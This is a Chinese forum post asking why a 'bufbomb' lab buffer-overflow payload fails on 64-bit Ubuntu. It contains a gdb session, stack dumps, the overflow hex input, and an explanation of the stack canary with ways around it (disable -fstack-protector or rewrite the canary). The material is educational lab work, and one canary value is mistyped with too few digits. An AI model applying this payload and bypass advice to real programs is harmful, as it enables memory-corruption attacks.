这个我做了n天了,还没有解决,大家帮忙看下,谢谢:
(gdb) run
Starting program: /media/BACKUP/CProjects/bufbomb
Breakpoint 1, getbuf () at bufbomb.c:39
39 {
(gdb) cont
Continuing.
Breakpoint 3, getbuf () at bufbomb.c:41
41 getxs(buf); //断点设在第41行
(gdb) disassemble getbuf
Dump of assembler code for function getbuf: //getbuf的汇编代码
0x00000000004006aa <getbuf+0>: push %rbp
0x00000000004006ab <getbuf+1>: mov %rsp,%rbp
0x00000000004006ae <getbuf+4>: sub $0x20,%rsp //为getbuf栈帧分配32字节,buf起始地址为%rbp-0x20;注意帧顶的8字节(%rbp-0x8)被紧接着的两条指令用来存放canary,所以buf最多只有24字节,一次写满32字节必然覆盖canary
0x00000000004006b2 <getbuf+8>: mov %fs:0x28,%rax
0x00000000004006bb <getbuf+17>: mov %rax,-0x8(%rbp) //把来自%fs:0x28的canary存到%rbp-0x8,也就是buf之后紧挨着的8字节(-fstack-protector生成的代码)
0x00000000004006bf <getbuf+21>: xor %eax,%eax
0x00000000004006c1 <getbuf+23>: lea -0x20(%rbp),%rdi
0x00000000004006c5 <getbuf+27>: callq 0x4005c8 <getxs>
0x00000000004006ca <getbuf+32>: mov $0x1,%eax
0x00000000004006cf <getbuf+37>: mov -0x8(%rbp),%rdx
0x00000000004006d3 <getbuf+41>: xor %fs:0x28,%rdx
0x00000000004006dc <getbuf+50>: je 0x4006e3 <getbuf+57>
0x00000000004006de <getbuf+52>: callq 0x4004f8 <__stack_chk_fail@plt> //上面的xor发现canary被改动时走到这里,打印 stack smashing detected 并abort,leaveq/retq根本执行不到
0x00000000004006e3 <getbuf+57>: leaveq
0x00000000004006e4 <getbuf+58>: retq
End of assembler dump.
(gdb) disassemble 0x400706 //0x400706是test调用getbuf后的返回地址
Dump of assembler code for function test: //test的汇编代码
0x00000000004006e5 <test+0>: push %rbp
0x00000000004006e6 <test+1>: mov %rsp,%rbp
0x00000000004006e9 <test+4>: sub $0x10,%rsp //test栈帧大小有16字节
0x00000000004006ed <test+8>: mov $0x400898,%edi
0x00000000004006f2 <test+13>: mov $0x0,%eax
0x00000000004006f7 <test+18>: callq 0x4004b8 <printf@plt>
0x00000000004006fc <test+23>: mov $0x0,%eax
0x0000000000400701 <test+28>: callq 0x4006aa <getbuf>
0x0000000000400706 <test+33>: mov %eax,-0x4(%rbp) //0x400706
0x0000000000400709 <test+36>: mov -0x4(%rbp),%esi //%rbp-0x4应该是val的地址
0x000000000040070c <test+39>: mov $0x4008a9,%edi
0x0000000000400711 <test+44>: mov $0x0,%eax
0x0000000000400716 <test+49>: callq 0x4004b8 <printf@plt>
0x000000000040071b <test+54>: leaveq
0x000000000040071c <test+55>: retq
End of assembler dump.
(gdb) p /x ($rbp)
$15 = 0x7fffbadfbfb0 //getbuf的%rbp
(gdb) p /x *(long*)($rbp)
$16 = 0x7fffbadfbfd0 //getbuf的%rbp指向的内容,即test的栈帧的%rbp
(gdb) p /x ($rbp-32)
$17 = 0x7fffbadfbf90 //buf起始地址
(gdb) x /32xg 0x7fffbadfbf90 //显示从buf起始处的内存
0x7fffbadfbf90: 0x0000000000400898 0x00007f62b2bdb2e0
0x7fffbadfbfa0: 0x00007f62b2bee580 0xff0a000000000000 //第二个qword(%rbp-0x8)是本次进程的canary原值,注意它最低字节为0
0x7fffbadfbfb0: 0x00007fffbadfbfd0 0x0000000000400706 //0x400706为返回地址,见上文的test汇编代码
0x7fffbadfbfc0: 0x00007fffbadfc140 0x00007f62b2881924
0x7fffbadfbfd0: 0x00007fffbadfc1a0 0x000000000040078c
0x7fffbadfbfe0: 0x0000000000000000 0x00007fffbadfc000
0x7fffbadfbff0: 0x00007fffbadfc198 0x00007f62b2881b10
0x7fffbadfc000: 0x0000000000000000 0x00007f62b2dfb9d8
0x7fffbadfc010: 0x00007f62b2dfb4b0 0x0000000000400380
0x7fffbadfc020: 0x00007f62b288dfd8 0x00000000004002d8
0x7fffbadfc030: 0x0000000100000000 0x00000001000007b8
0x7fffbadfc040: 0x00007fffbadfc178 0x00007f62b2dfc358
0x7fffbadfc050: 0x00007fffbadfc1d0 0x00007fffbadfc180
0x7fffbadfc060: 0x00000000f63d4e2e 0x00007fffbadfc198
0x7fffbadfc070: 0x00007f62b2dfb9d8 0x00007f62b2be9c6f
0x7fffbadfc080: 0x0000000000000000 0x00007f62b2dfb9d8
(gdb) cont
Continuing. //向buf中输入数据
Type Hex string:3132333435363738 3940414243444546 4748495051525354 5556575859606162
d0bfdfbaff7f0000 0907400000000000 0000000000000000 00000000efbeadde
a0c1dfbaff7f0000 8c07400000000000
Breakpoint 2, getbuf () at bufbomb.c:42
42 return 1;
(gdb) x /32xg 0x7fffbadfbf90 //写入数据后的内存情况
0x7fffbadfbf90: 0x3837363534333231 0x4645444342414039 //可以看到buf刚才向buf中写入的数据
0x7fffbadfbfa0: 0x5453525150494847 0x6261605958575655 //第二个qword(%rbp-0x8)原来是canary 0xff0a000000000000,现在被输入的第4个qword覆盖成0x6261605958575655,这就是后面报 stack smashing detected 的直接原因
0x7fffbadfbfb0: 0x00007fffbadfbfd0 0x0000000000400709 //改变了返回地址为0x400709,见上文test汇编代码
0x7fffbadfbfc0: 0x0000000000000000 0xdeadbeef00000000 //更改val的内容为0xdeadbeef
0x7fffbadfbfd0: 0x00007fffbadfc1a0 0x000000000040078c
0x7fffbadfbfe0: 0x0000000000000000 0x00007fffbadfc000
0x7fffbadfbff0: 0x00007fffbadfc198 0x00007f62b2881b10
0x7fffbadfc000: 0x0000000000000000 0x00007f62b2dfb9d8
0x7fffbadfc010: 0x00007f62b2dfb4b0 0x0000000000400380
0x7fffbadfc020: 0x00007f62b288dfd8 0x00000000004002d8
0x7fffbadfc030: 0x0000000100000000 0x00000001000007b8
0x7fffbadfc040: 0x00007fffbadfc178 0x00007f62b2dfc358
0x7fffbadfc050: 0x00007fffbadfc1d0 0x00007fffbadfc180
0x7fffbadfc060: 0x00000000f63d4e2e 0x00007fffbadfc198
0x7fffbadfc070: 0x00007f62b2dfb9d8 0x00007f62b2be9c6f
0x7fffbadfc080: 0x0000000000000000 0x00007f62b2dfb9d8
(gdb) cont //但是,结果......
Continuing.
*** stack smashing detected ***: /media/BACKUP/CProjects/bufbomb terminated
======= Backtrace: =========
/lib/libc.so.6(__fortify_fail+0x37)[0x7f62b296b617]
/lib/libc.so.6(__fortify_fail+0x0)[0x7f62b296b5e0]
/media/BACKUP/CProjects/bufbomb[0x4006e3]
/media/BACKUP/CProjects/bufbomb[0x400709]
/media/BACKUP/CProjects/bufbomb[0x40078c]
/lib/libc.so.6(__libc_start_main+0xf4)[0x7f62b289c1c4]
/media/BACKUP/CProjects/bufbomb[0x400539]
======= Memory map: ========
00400000-00401000 r-xp 00000000 08:03 75 /media/BACKUP/CProjects/bufbomb
00600000-00601000 rw-p 00000000 08:03 75 /media/BACKUP/CProjects/bufbomb
00601000-00622000 rw-p 00601000 00:00 0 [heap]
7f62b2670000-7f62b267d000 r-xp 00000000 08:07 16914 /lib/libgcc_s.so.1
7f62b267d000-7f62b287d000 ---p 0000d000 08:07 16914 /lib/libgcc_s.so.1
7f62b287d000-7f62b287e000 rw-p 0000d000 08:07 16914 /lib/libgcc_s.so.1
7f62b287e000-7f62b29d6000 r-xp 00000000 08:07 16993 /lib/libc-2.7.so
7f62b29d6000-7f62b2bd6000 ---p 00158000 08:07 16993 /lib/libc-2.7.so
7f62b2bd6000-7f62b2bd9000 r--p 00158000 08:07 16993 /lib/libc-2.7.so
7f62b2bd9000-7f62b2bdb000 rw-p 0015b000 08:07 16993 /lib/libc-2.7.so
7f62b2bdb000-7f62b2be0000 rw-p 7f62b2bdb000 00:00 0
7f62b2be0000-7f62b2bfd000 r-xp 00000000 08:07 16990 /lib/ld-2.7.so
7f62b2de5000-7f62b2de7000 rw-p 7f62b2de5000 00:00 0
7f62b2df8000-7f62b2dfd000 rw-p 7f62b2df8000 00:00 0
7f62b2dfd000-7f62b2dff000 rw-p 0001d000 08:07 16990 /lib/ld-2.7.so
7fffbade9000-7fffbadfe000 rw-p 7ffffffea000 00:00 0 [stack]
7fffbadfe000-7fffbae00000 r-xp 7fffbadfe000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Program received signal SIGABRT, Aborted.
0x00007f62b28b0095 in raise () from /lib/libc.so.6
(gdb)
环境:Ubuntu 8.04, 内核:Linux 2.6.24-21-generic
gcc版本:
gcc (GCC) 4.2.4 (Ubuntu 4.2.4-1ubuntu1)
Copyright (C) 2007 Free Software Foundation, Inc.
是不是64位的汇编可以检测出缓冲区溢出啊,谁知道帮我一下,先谢谢大家了!
补充分析:这和64位汇编本身无关,而是Ubuntu的gcc默认打开了-fstack-protector。getbuf+8/+17两条指令把%fs:0x28里的canary存到%rbp-0x8(紧挨在buf之后的8字节),getbuf+37/+41在返回前把它重新和%fs:0x28比较,不相等就调用__stack_chk_fail,于是看到"stack smashing detected"。输入的第4个qword(5556575859606162)正好落在这个位置:写入前该处是0xff0a000000000000,写入后变成0x6261605958575655,检查必然失败,后面精心构造的返回地址0x400709和val=0xdeadbeef根本没有机会生效。解决办法有两种:一是用-fno-stack-protector重新编译bufbomb(这个实验本来就要求关掉保护);二是在输入里把第4个qword换成本次进程canary的原值(getxs之前x/gx $rbp-8可以读到,按小端序写成00000000000aff),但它由内核随机提供、每次运行都不一样,而且最低字节为0,对字符串类输入很难原样写进去。另外payload里硬编码的栈地址0x7fffbadfbfd0只在栈布局不变(同一gdb会话或ASLR关闭)时才正确,脱离gdb运行时需要重新确认。